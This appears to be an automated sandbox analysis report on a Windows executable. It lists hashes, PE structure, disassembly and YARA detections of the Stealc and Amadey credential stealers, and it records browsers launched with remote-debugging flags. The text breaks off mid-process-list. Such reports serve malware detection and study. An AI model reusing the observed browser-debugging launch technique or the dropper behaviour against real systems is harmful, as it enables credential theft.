                                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L... .pg.............................$............@...........................;...........@................................. P-..............................P-.........................................................................................................................@............0... ......."..............@................P...2...0..............@............@...0...$...b..............@.............'..p......................@....data....P...P-..P...@..............@...........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                    \Device\ConDrv

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exe
                                                                                                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):15
                                                                                                                                                                                                                                                    Entropy (8bit):3.906890595608518
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SXhRi75n:SC5
                                                                                                                                                                                                                                                    MD5:3A33AF4BC7DC9699EE324B91553C2B46
                                                                                                                                                                                                                                                    SHA1:4CCE2BF1011CA006FAAB23506A349173ACC40434
                                                                                                                                                                                                                                                    SHA-256:226D20C16ED4D8DDDFD00870E83E3B6EEDEDB86704A7BF43B5826B71D61500AE
                                                                                                                                                                                                                                                    SHA-512:960194C8B60C086520D1A76B94F52BA88AC2DDEC76A18B2D7ABF758FFFF138E9EDD23E62D4375A34072B42FBA51C6D186554B1AA71D60835EF1E18BEB8873B1D
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:1.29548Enjoy!..

                                                                                                                                                                                                                                                    \Device\Null

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Windows\System32\schtasks.exe
                                                                                                                                                                                                                                                    File Type:ASCII text, with CRLF, CR line terminators
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):52
                                                                                                                                                                                                                                                    Entropy (8bit):4.259368622572871
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:RLgbWRthLK5a6eCMABR:RLgbWoJPh
                                                                                                                                                                                                                                                    MD5:299EBDC3FE95E747C8BBF59201D8B2D6
                                                                                                                                                                                                                                                    SHA1:DA2270E23AB6FFE5DA5E0A0D5482FAD0E8475CE9
                                                                                                                                                                                                                                                    SHA-256:4D8D8B138A4A51C410892DB0DCDAB046FB7C5B5149FC115A9F91070B35226C5A
                                                                                                                                                                                                                                                    SHA-512:274C996DF202D80A02CCA5C1F73D60FC7D15AAC2C77C5AD5A443721073FF8DF2111BDD832D990AA0E91A9E86E0303689E88871DE651FBB1237F12576362B94DF
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:ERROR: The system cannot find the file specified....

                                                                                                                                                                                                                                                    Static File Info

                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Entropy (8bit):7.949414755762918
                                                                                                                                                                                                                                                    TrID:
                                                                                                                                                                                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                    File name:EdYEXasNiR.exe
                                                                                                                                                                                                                                                    File size:1'857'024 bytes
                                                                                                                                                                                                                                                    MD5:0be97a686bb58f470d1d096a12097fa8
                                                                                                                                                                                                                                                    SHA1:b35c19eb80c62bfae9ed4561165729bf96d3ea99
                                                                                                                                                                                                                                                    SHA256:02c7411fd491368727387ac793e3bb3fcd9b792f1a18cec7c0da5cd65cbccc72
                                                                                                                                                                                                                                                    SHA512:33d75500f68c9105538b055172ac4ba24d587739bb450ccd68fc975c8298995a6885c71b675e595b834b65caa13db0ee5f5356b98baae9bc8d1abf55ca7ef9cf
                                                                                                                                                                                                                                                    SSDEEP:24576:43BI7l6Ud0AOYP2m5DzS0ygKY6BFM6STj8MoI0U5Qhy2i6m0xInx48Ta3U+YpSw7:43BQ6JmZ+0yS6HnGo2uY6m0Kx48vSw
                                                                                                                                                                                                                                                    TLSH:CF8533A12C6171E3C8A04A75E2AF91CB7FFDD6D5C4046BBA8F09682D6463F16507BCE0
                                                                                                                                                                                                                                                    File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L... .pg..............................I...........@...........................I...........@.................................Y@..m..

                                                                                                                                                                                                                                                    File Icon

                                                                                                                                                                                                                                                    Icon Hash:90cececece8e8eb0

                                                                                                                                                                                                                                                    Static PE Info

                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                    Entrypoint:0x899000
                                                                                                                                                                                                                                                    Entrypoint Section:.taggant
                                                                                                                                                                                                                                                    Digitally signed:false
                                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                                    Subsystem:windows gui
                                                                                                                                                                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                    DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                    Time Stamp:0x67701720 [Sat Dec 28 15:20:00 2024 UTC]
                                                                                                                                                                                                                                                    TLS Callbacks:
                                                                                                                                                                                                                                                    CLR (.Net) Version:
                                                                                                                                                                                                                                                    OS Version Major:6
                                                                                                                                                                                                                                                    OS Version Minor:0
                                                                                                                                                                                                                                                    File Version Major:6
                                                                                                                                                                                                                                                    File Version Minor:0
                                                                                                                                                                                                                                                    Subsystem Version Major:6
                                                                                                                                                                                                                                                    Subsystem Version Minor:0
                                                                                                                                                                                                                                                    Import Hash:2eabe9054cad5152567f0699947a2c5b

                                                                                                                                                                                                                                                    Entrypoint Preview

                                                                                                                                                                                                                                                    Instruction
                                                                                                                                                                                                                                                    jmp 00007FD358DD331Ah
                                                                                                                                                                                                                                                    sysenter
                                                                                                                                                                                                                                                    sbb al, 00h
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    jmp 00007FD358DD5315h
                                                                                                                                                                                                                                                    add byte ptr [edx], al
                                                                                                                                                                                                                                                    or al, byte ptr [eax]
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [eax], dh
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add al, 00h
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [eax], cl
                                                                                                                                                                                                                                                    add byte ptr [eax], 00000000h
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    adc byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    push es
                                                                                                                                                                                                                                                    or al, byte ptr [eax]
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [eax], dl
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [edi], al
                                                                                                                                                                                                                                                    or al, byte ptr [eax]
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [ecx], cl
                                                                                                                                                                                                                                                    add byte ptr [eax], 00000000h
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    adc byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    pop es
                                                                                                                                                                                                                                                    or al, byte ptr [eax]
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [eax], dh
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [eax+eax], ah
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    and dword ptr [eax], eax
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add dword ptr [eax+00000000h], eax
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    adc byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    push es
                                                                                                                                                                                                                                                    or al, byte ptr [eax]
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [eax], dl
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [edi], al
                                                                                                                                                                                                                                                    or al, byte ptr [eax]
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [esi], al
                                                                                                                                                                                                                                                    add byte ptr [eax], 00000000h
                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                    add byte ptr [eax], al

                                                                                                                                                                                                                                                    Data Directories

                                                                                                                                                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x540590x6d.idata
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x530000x2b0.rsrc
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x541f80x8.idata
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                                    Sections

                                                                                                                                                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                    0x10000x520000x260006f0c8981bafafb75398e372c5e74fccdFalse0.9999421772203947data7.9828338445910125IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                    .rsrc0x530000x2b00x400fe67bb2a9df3150b9c94de8bd81ed8a0False0.3603515625data5.186832724894366IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                    .idata 0x540000x10000x20039a711a7d804ccbc2a14eea65cf3c27eFalse0.154296875data1.0789976601211375IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                    0x550000x2a70000x200e4607df23f92eac0c4180bc03287e711unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                    ulqubmxb0x2fc0000x19c0000x19b800792ff492e0e23fcd75fc8a1815eeb29fFalse0.9950317531136087OpenPGP Secret Key7.955389523438137IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                    cfocvtil0x4980000x10000x400f28a105af91bce7331cd9982b15972b6False0.7861328125data6.111905796447916IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                    .taggant0x4990000x30000x2200abd953d5a9100c89655717c2ab95255dFalse0.07456341911764706DOS executable (COM)0.8597840590916789IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                                                                                                                                                                                                    Resources

                                                                                                                                                                                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                    RT_MANIFEST0x530580x256ASCII text, with CRLF line terminators0.5100334448160535

                                                                                                                                                                                                                                                    Imports

                                                                                                                                                                                                                                                    DLLImport
                                                                                                                                                                                                                                                    kernel32.dlllstrcpy

                                                                                                                                                                                                                                                    Network Behavior

                                                                                                                                                                                                                                                    Skipped network analysis since the amount of network traffic is too extensive. Please download the PCAP and check manually.

                                                                                                                                                                                                                                                    Statistics

                                                                                                                                                                                                                                                    CPU Usage

                                                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                                                    Memory Usage

                                                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                                                    High Level Behavior Distribution

                                                                                                                                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                                                                                                                                    Behavior

                                                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                                                    System Behavior

                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                    Target ID:0
                                                                                                                                                                                                                                                    Start time:09:42:04
                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                    Path:C:\Users\user\Desktop\EdYEXasNiR.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:"C:\Users\user\Desktop\EdYEXasNiR.exe"
                                                                                                                                                                                                                                                    Imagebase:0xcd0000
                                                                                                                                                                                                                                                    File size:1'857'024 bytes
                                                                                                                                                                                                                                                    MD5 hash:0BE97A686BB58F470D1D096A12097FA8
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1600078469.0000000001915000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1601767639.0000000001918000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                    Target ID:3
                                                                                                                                                                                                                                                    Start time:09:42:24
                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exe"
                                                                                                                                                                                                                                                    Imagebase:0xef0000
                                                                                                                                                                                                                                                    File size:5'206'016 bytes
                                                                                                                                                                                                                                                    MD5 hash:3F6AB8A7E543EE65455B7D923402EF58
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                                                    • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000003.00000002.2212351037.0000000000EF1000.00000040.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                    • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000003.00000002.2211683173.0000000000DCE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.2212351037.0000000000FC4000.00000040.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                    Target ID:5
                                                                                                                                                                                                                                                    Start time:09:42:28
                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exe"
                                                                                                                                                                                                                                                    Imagebase:0xe70000
                                                                                                                                                                                                                                                    File size:3'220'480 bytes
                                                                                                                                                                                                                                                    MD5 hash:69E09CBF7B56454D9FF5686CD8FE492F
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000005.00000002.1849269108.0000000000E71000.00000040.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                    Target ID:6
                                                                                                                                                                                                                                                    Start time:09:42:33
                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
                                                                                                                                                                                                                                                    Imagebase:0xf50000
                                                                                                                                                                                                                                                    File size:3'220'480 bytes
                                                                                                                                                                                                                                                    MD5 hash:69E09CBF7B56454D9FF5686CD8FE492F
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000006.00000002.1915110312.0000000000F51000.00000040.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                    Target ID:7
                                                                                                                                                                                                                                                    Start time:09:42:33
                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                    Imagebase:0xf50000
                                                                                                                                                                                                                                                    File size:3'220'480 bytes
                                                                                                                                                                                                                                                    MD5 hash:69E09CBF7B56454D9FF5686CD8FE492F
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000007.00000002.1917695325.0000000000F51000.00000040.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                    Target ID:8
                                                                                                                                                                                                                                                    Start time:09:42:34
                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
                                                                                                                                                                                                                                                    Imagebase:0x7ff6a3150000
                                                                                                                                                                                                                                                    File size:3'242'272 bytes
                                                                                                                                                                                                                                                    MD5 hash:83395EAB5B03DEA9720F8D7AC0D15CAA
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                    Target ID:10
                                                                                                                                                                                                                                                    Start time:09:42:36
                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2416 --field-trial-handle=2152,i,11031812561136754540,12085514892588274456,262144 /prefetch:8
                                                                                                                                                                                                                                                    Imagebase:0x7ff6a3150000
                                                                                                                                                                                                                                                    File size:3'242'272 bytes
                                                                                                                                                                                                                                                    MD5 hash:83395EAB5B03DEA9720F8D7AC0D15CAA
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                    Target ID:14
                                                                                                                                                                                                                                                    Start time:09:42:45
                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=""
                                                                                                                                                                                                                                                    Imagebase:0x7ff740fe0000
                                                                                                                                                                                                                                                    File size:4'210'216 bytes
                                                                                                                                                                                                                                                    MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                    Target ID:15
                                                                                                                                                                                                                                                    Start time:09:42:46
                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2312 --field-trial-handle=2148,i,10048407555887453736,9436864136807657335,262144 /prefetch:3
                                                                                                                                                                                                                                                    Imagebase:0x7ff740fe0000
                                                                                                                                                                                                                                                    File size:4'210'216 bytes
                                                                                                                                                                                                                                                    MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                    Target ID:16
                                                                                                                                                                                                                                                    Start time:09:42:46
                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
                                                                                                                                                                                                                                                    Imagebase:0x7ff740fe0000
                                                                                                                                                                                                                                                    File size:4'210'216 bytes
                                                                                                                                                                                                                                                    MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                    Target ID:17
                                                                                                                                                                                                                                                    Start time:09:42:46
                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2324 --field-trial-handle=2008,i,2217384488025341277,266429373537081613,262144 /prefetch:3
                                                                                                                                                                                                                                                    Imagebase:0x7ff740fe0000
                                                                                                                                                                                                                                                    File size:4'210'216 bytes
                                                                                                                                                                                                                                                    MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                    Target ID:18
                                                                                                                                                                                                                                                    Start time:09:43:00
                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
